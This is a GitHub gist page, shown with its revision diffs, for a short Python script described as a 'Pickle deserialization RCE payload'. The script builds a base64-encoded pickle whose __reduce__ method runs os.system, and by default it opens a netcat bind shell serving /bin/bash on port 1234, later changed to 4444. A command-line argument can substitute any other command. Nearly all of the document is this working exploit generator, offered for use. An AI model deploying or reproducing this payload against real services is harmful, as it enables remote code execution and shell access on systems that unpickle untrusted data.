-
-
Save zema1/47f4cf15a371c36f37278f63b33e9abf to your computer and use it in GitHub Desktop.
Revisions
-
mgeeky revised this gist
Aug 1, 2016 . 1 changed file with 1 addition and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -10,7 +10,7 @@ import sys import base64 DEFAULT_COMMAND = "netcat -c '/bin/bash -i' -l -p 4444" COMMAND = sys.argv[1] if len(sys.argv) > 1 else DEFAULT_COMMAND class PickleRce(object): -
Aug 1, 2016 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,20 @@ #!/usr/bin/python # # Pickle deserialization RCE payload. # To be invoked with command to execute at it's first parameter. # Otherwise, the default one will be used. # import cPickle import os import sys import base64 DEFAULT_COMMAND = "netcat -c '/bin/bash -i' -l -p 1234" COMMAND = sys.argv[1] if len(sys.argv) > 1 else DEFAULT_COMMAND class PickleRce(object): def __reduce__(self): return (os.system,(COMMAND,)) print base64.b64encode(cPickle.dumps(PickleRce()))